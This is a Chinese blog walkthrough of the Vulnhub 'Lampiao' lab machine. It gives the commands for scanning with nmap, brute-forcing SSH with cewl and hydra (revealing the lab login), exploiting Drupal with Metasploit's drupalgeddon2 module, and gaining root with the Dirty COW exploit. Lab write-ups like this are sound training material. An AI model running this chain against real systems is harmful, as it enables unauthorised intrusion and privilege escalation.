前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >带妹玩转vulnhub(四)

带妹玩转vulnhub(四)

作者头像
用户5878089
发布2019-07-25 16:11:57
4590
发布2019-07-25 16:11:57
举报

前言

今天我们请到了炫酷的女装大佬,和我一起为大家进行讲解,这次就不带妹子玩了,毕竟有女装大佬,真香!?

带妹是不可能带妹的,这辈子都不可能带妹的?

开始

下载

同样的在Vulnhub上下载对应的镜像下载链接 https://www.vulnhub.com/entry/lampiao-1,249/

基本配置

这都已经第四篇了,就不多介绍了。参考着官网上的说明来就可以咯,我这英语不及格的都能看懂,各位朋友还看不懂么??

女装大佬鄙夷的眼神?,切!

信息搜集

主机发现

netdiscover -r 192.168.43.0/24

端口扫描

使用nmap 192.168.43.52,这里吸取了前面的教训,我使用如下命令进行更加详细的扫描

nmap -O -sV -p- -T4 192.168.43.52

这样便可以尽最大可能的获取更多的信息。

开始渗透

访问80端口一段鬼画符

看看1898都有什么东西,是一个drupal搭建的网站, 这又是涉及到web了,我太菜表示没有思路,不过这种开源框架搭建的网站应该会有很多漏洞的吧,网上搜罗了一番找到了两种方法可以解决。

这时炫酷的女装大佬表示,你个菜鸡?,闪开,让我来。 只见大佬从口袋里掏出一把梭,上去就是干! 等我从眩晕中清醒过来后,发现大佬已经拿下root 此时的光芒太刺眼,我赶紧低下了头,暗暗下定决心以后再以不敢带妹了,跟着炫酷的女装大佬混准没错!真香!? 最后通过命令行,我找到了大佬操作的蛛丝马迹。

漏洞利用

drupal漏洞利用

1

方法一

这里涉及到kali下的两个工具cewl 和 hydra 关于cewl的介绍可以参考这篇文章

https://tools.kali.org/password-attacks/cewl

通过这个工具可以针对指定的网站,生成一个单词列表

通过robtos.txt我们可以知道一些参数提交的方式(不知道这样子描述是否正确),为了生成一个单词列表,我们需要遍历这个网站上的所有文章,所以尝试访问http://192.168.43.52:1898/?q=node/1这个页面,便可以看到所有的文章。于是cewl的命令如下:

cewl -w wordlist.txt http://192.168.43.52:1898/?q=node/1

然后使用hydra爆破ssh登陆的用户名和密码,这个在上一篇文章有用到哦? 通过查看文章我发现两个可疑的用户名。

最后我通过如下命令进行爆破。

hydra -L username.txt -P wordlist.txt ssh://192.168.43.52:22

可以得到用户民tiago和密码Virgulino

2

我在另一篇文章中看到了可以直接使用kali下的msf进行攻击。 主要命令如下:

use exploit/unix/webapp/drupal_drupalgeddon2

set rhost 192.168.43.52

set rport 1898

exploit

但是我个人感觉msf的shell没有ssh好用,所以最后还是选择使用ssh进行连接

权限提升

权限提升

ssh登陆并查看一些基本版本和权限信息。

根据版本号,我们可以利用CVE-2016-5195对其进行提权,之前我也介绍过github上别人收集的库,这里也就不具体说了,使用scp将源代码上传至目标主机,按着要求进行编译,之后我们便可以获取root权限。 参考的漏洞网站

https://www.exploit-db.com/exploits/40847/

scp 40847.c tiago@192.168.43.52:40847.c g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.c -lutil ./dcow -s

这里可以使用一个脚本自动查找适合什么漏洞

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

至此已经生无可恋,这次有女装大佬带我飞,真的不要太刺激,以后端茶倒水的活就交给我好了。

炫酷的女装大佬发话了,欢迎妹子加入,包教包会。 你心动了么?方正我是心动了? 诶,大佬等等我? 只见大佬一脚油门便消失在天际,只留下一串文字

279800B8148548F6CC3F9E58D03BBCCC

这难道是在暗示我?,哦耶!!?

总结

这次总体难度不大,也不算复杂,主要是两个工具cewl 和 hydra还有一些常见的漏洞。

人都走完了,我在路边随手解开一辆共享单车?‍♀️,悠然的骑走了 带妹是不可能的,这辈子都不可能的!?

参考文章

http://www.hackingarticles.in/hack-the-lampiao-1-ctf-challenge/

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-04-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 无级安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档